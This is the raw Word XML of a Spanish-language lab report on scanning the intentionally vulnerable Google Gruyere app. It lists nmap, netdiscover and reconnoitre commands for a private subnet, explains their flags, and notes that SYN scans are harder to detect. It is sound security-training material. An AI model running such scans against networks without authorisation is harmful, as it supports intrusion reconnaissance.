    <w:p w14:paraId="220F8184" w14:textId="27C3F266" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="23370B06" w14:textId="129E8F02" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="67E0F081" w14:textId="08B35452" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="62B67EDE" w14:textId="2A3CDB71" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="7BBB4767" w14:textId="68DCE62F" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="7D778A70" w14:textId="55C1A9EA" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="01A04F7A" w14:textId="080DCD5E" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="148C451A" w14:textId="27ADDF6B" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="5460D680" w14:textId="6F064EFE" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="60114A60" w14:textId="77777777" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="1C2DA600" w14:textId="4E7404E1" w:rsidR="004601B3" w:rsidRDefault="004601B3" w:rsidP="004601B3">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc128034149"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Análisis de la aplicación con herramientas automáticas:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="53EC067A" w14:textId="79503687" w:rsidR="000B727F" w:rsidRPr="000B727F" w:rsidRDefault="000B727F" w:rsidP="000B727F">
      <w:r>
        <w:t>Voy a usar varias herramientas de detección de vulnerabilidades automáticas, para tener una mejor visión de las vulnerabilidades que existen en la aplicación web de Google Gruyere</w:t>
      </w:r>
      <w:r w:rsidR="00013B03">
        <w:t>, pues estas herramientas automáticas muchas veces no detectan todas las vulnerabilidades, sin contar falsos positivos</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE4028F" w14:textId="6418B5AF" w:rsidR="004601B3" w:rsidRDefault="00CF28B7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc128034150"/>
      <w:r>
        <w:t>Descubrimiento del equipo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="22FED444" w14:textId="77777777" w:rsidR="00CF28B7" w:rsidRPr="00CF28B7" w:rsidRDefault="00CF28B7" w:rsidP="00CF28B7"/>
    <w:p w14:paraId="46F05A1D" w14:textId="4FAF33E1" w:rsidR="00CF28B7" w:rsidRDefault="00CF28B7" w:rsidP="00CF28B7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Primero tendré que saber </w:t>
      </w:r>
      <w:r w:rsidR="00DB6D05">
        <w:t>dónde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00711AF7">
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidR="00DB6D05">
        <w:t xml:space="preserve"> corriendo Google Gruyere en la red</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6619DB" w14:textId="77777777" w:rsidR="008353EE" w:rsidRDefault="008353EE" w:rsidP="00CF28B7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FDF9144" w14:textId="3B1F7BFD" w:rsidR="00CF28B7" w:rsidRDefault="00CF28B7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc128034151"/>
      <w:r>
        <w:t>NMAP -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="41E47F6A" w14:textId="77777777" w:rsidR="00F21B6A" w:rsidRPr="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A"/>
    <w:p w14:paraId="0BEC0150" w14:textId="58AF92B6" w:rsidR="00CF28B7" w:rsidRDefault="00F21B6A" w:rsidP="00CF28B7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00CF28B7">
        <w:t>omando</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D1FE84" w14:textId="02087167" w:rsidR="00CF28B7" w:rsidRPr="008353EE" w:rsidRDefault="008353EE" w:rsidP="00CF28B7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00CF28B7" w:rsidRPr="008353EE">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -sS -sV -A -T4 -p1-1000 --top-ports 1000 -oN resultado.txt 192.168.1.1-255</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1527F02A" w14:textId="77777777" w:rsidR="002829E8" w:rsidRDefault="002829E8" w:rsidP="00CF28B7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E077A4" w14:textId="6D86CCD1" w:rsidR="00CF28B7" w:rsidRPr="00CF28B7" w:rsidRDefault="00CF28B7" w:rsidP="00CF28B7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF28B7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>xplicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241DD80F" w14:textId="174AB8DB" w:rsidR="00CF28B7" w:rsidRDefault="00CF28B7" w:rsidP="00CF28B7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-sS: escaneo de conexión SYN, que es más rápido y menos detectable que un escaneo completo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F68394" w14:textId="28A25B03" w:rsidR="00CF28B7" w:rsidRDefault="00CF28B7" w:rsidP="00CF28B7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-sV: detección de versiones de servicios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37228D39" w14:textId="778A576E" w:rsidR="00CF28B7" w:rsidRDefault="00CF28B7" w:rsidP="00CF28B7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-A: habilita la detección de sistemas operativos, versiones de servicios y scripts de detección de vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43908FFC" w14:textId="114912E5" w:rsidR="00CF28B7" w:rsidRDefault="00CF28B7" w:rsidP="00CF28B7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-T4: ajusta la velocidad del escaneo para ser más rápido, útil para redes grandes o con alta carga de trabajo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF08CF1" w14:textId="3B669F74" w:rsidR="00CF28B7" w:rsidRDefault="00CF28B7" w:rsidP="00CF28B7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-oN: guarda el resultado del escaneo en un archivo de texto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F1B568" w14:textId="676C56E6" w:rsidR="00CF28B7" w:rsidRDefault="00CF28B7" w:rsidP="00CF28B7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>-oX: guarda el resultado del escaneo en un archivo XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19510275" w14:textId="77777777" w:rsidR="00CF28B7" w:rsidRDefault="00CF28B7" w:rsidP="00CF28B7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-iL: especifica un archivo de texto que contiene una lista de direcciones IP a escanear. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424EA1D4" w14:textId="47CB49A4" w:rsidR="00CF28B7" w:rsidRDefault="00CF28B7" w:rsidP="00CF28B7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>--top-ports: especifica el número de los puertos más comunes a escanear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD500F4" w14:textId="72926B73" w:rsidR="00DB6D05" w:rsidRDefault="00DB6D05" w:rsidP="00CF28B7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1256AA28" w14:textId="5306F6FE" w:rsidR="00DB6D05" w:rsidRDefault="00DB6D05" w:rsidP="00DB6D05">
      <w:pPr>
        <w:ind w:left="1416" w:hanging="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6D05">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CF87A44" wp14:editId="0A235A08">
            <wp:extent cx="5400040" cy="13595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359535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3E48F0" w14:textId="523A1A6F" w:rsidR="00DB6D05" w:rsidRDefault="00DB6D05" w:rsidP="00DB6D05">
      <w:pPr>
        <w:ind w:left="1416" w:hanging="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A14E3FA" w14:textId="5477383E" w:rsidR="00DB6D05" w:rsidRDefault="00DB6D05" w:rsidP="00DB6D05">
      <w:pPr>
        <w:ind w:left="1416" w:hanging="708"/>
      </w:pPr>
      <w:r>
        <w:t>Resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E4197" w14:textId="77777777" w:rsidR="00DB6D05" w:rsidRDefault="00DB6D05" w:rsidP="00DB6D05">
      <w:pPr>
        <w:ind w:left="1416" w:hanging="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431A9606" w14:textId="24219ABD" w:rsidR="00CF28B7" w:rsidRDefault="002829E8" w:rsidP="00CF28B7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="002829E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2845C0C6" wp14:editId="5C6B86DC">
            <wp:extent cx="5400040" cy="343471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434715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3839FEF5" w14:textId="23F6BC9F" w:rsidR="002829E8" w:rsidRDefault="002829E8" w:rsidP="00CF28B7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAEDB67" w14:textId="687202CA" w:rsidR="002829E8" w:rsidRDefault="002829E8">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc128034152"/>
      <w:r>
        <w:t>Netdiscover -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="78E1F8EA" w14:textId="01FC378C" w:rsidR="002829E8" w:rsidRDefault="002829E8" w:rsidP="002829E8"/>
    <w:p w14:paraId="43EBA8E3" w14:textId="4CC19FE2" w:rsidR="00F21B6A" w:rsidRPr="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F21B6A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61672774" w14:textId="2235B679" w:rsidR="002829E8" w:rsidRPr="008353EE" w:rsidRDefault="008353EE" w:rsidP="002829E8">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="002829E8" w:rsidRPr="008353EE">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>netdiscover -i eth0 -r 192.168.1.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC1EDE9" w14:textId="49D0C788" w:rsidR="002829E8" w:rsidRPr="00F21B6A" w:rsidRDefault="002829E8" w:rsidP="002829E8">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E3B437" w14:textId="77777777" w:rsidR="002829E8" w:rsidRDefault="002829E8" w:rsidP="002829E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-i eth0 especifica la interfaz de red a utilizar para el escaneo. En este caso, se está utilizando eth0. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69838C9D" w14:textId="6A568D47" w:rsidR="002829E8" w:rsidRDefault="002829E8" w:rsidP="002829E8">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>-r 192.168.1.0/24 especifica la subred a escanear, en este caso la subred es 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1576D595" w14:textId="180DA134" w:rsidR="002829E8" w:rsidRDefault="002829E8" w:rsidP="002829E8">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55274C37" wp14:editId="3377DAB2">
            <wp:extent cx="5400040" cy="103251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032510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE06C1" w14:textId="6A013886" w:rsidR="002829E8" w:rsidRDefault="002829E8" w:rsidP="002829E8">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BE26CCF" w14:textId="009B3D10" w:rsidR="002829E8" w:rsidRDefault="002829E8" w:rsidP="002829E8">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E824F79" w14:textId="6EFC1B7C" w:rsidR="002829E8" w:rsidRDefault="002829E8" w:rsidP="002829E8">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="002829E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04D4017F" wp14:editId="0D8473B2">
            <wp:extent cx="5400040" cy="1898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89865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B75B1B" w14:textId="0D2F0CC7" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="002829E8">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6109EC55" w14:textId="54BC6201" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="002829E8">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A089422" w14:textId="688F9255" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc128034153"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Reconnoitre -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="66EDBB17" w14:textId="2994E96F" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CC10FA" w14:textId="040D016C" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38292EDB" w14:textId="31FDFF8B" w:rsidR="00F21B6A" w:rsidRPr="008353EE" w:rsidRDefault="008353EE" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00F21B6A" w:rsidRPr="008353EE">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reconnoitre -t 192.168.1.0-255 -o ./results/ --pingsweep --hostnames --services –</w:t>
      </w:r>
      <w:r w:rsidR="008F3F14" w:rsidRPr="008353EE">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00F21B6A" w:rsidRPr="008353EE">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quick</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB6EB6" w14:textId="72CD67C3" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DF52B4F" w14:textId="77777777" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-t 192.168.1.0-255 especifica el rango de direcciones IP a escanear, en este caso es el rango de direcciones IP de la subred 192.168.1.0/24. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618B3DEE" w14:textId="77777777" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-o ./results/ especifica la ruta donde se guardarán los resultados del escaneo. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3B132" w14:textId="77777777" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">--pingsweep habilita el barrido de ping para encontrar dispositivos activos en el rango de direcciones especificado. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1541ADEC" w14:textId="77777777" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">--hostnames habilita la detección de nombres de host. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B9F9A6" w14:textId="77777777" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">--services habilita la detección de servicios y versiones. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D12A192" w14:textId="70895104" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>--quick habilita un escaneo rápido, es más rápido, pero menos preciso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5F293" w14:textId="1C67CF71" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558DD3F4" w14:textId="47E71D6F" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00F21B6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B2CF99D" wp14:editId="41DFF5D7">
            <wp:extent cx="5400040" cy="1248410"/>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248410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08610D7C" w14:textId="0A9ACDF3" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FDB97A6" w14:textId="72020A67" w:rsidR="00F21B6A" w:rsidRDefault="00F21B6A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535610F2" w14:textId="27D4F3C0" w:rsidR="00D05267" w:rsidRDefault="00D05267" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F97CC71" w14:textId="292DD910" w:rsidR="00D05267" w:rsidRDefault="00D05267" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Hosts descubiertos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED0105" w14:textId="3D721178" w:rsidR="00D05267" w:rsidRDefault="00D05267" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F6E126" w14:textId="629BA5D2" w:rsidR="00F21B6A" w:rsidRDefault="0058188B" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="0058188B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0835679F" wp14:editId="6A6C1856">
            <wp:extent cx="5400040" cy="13017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01750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
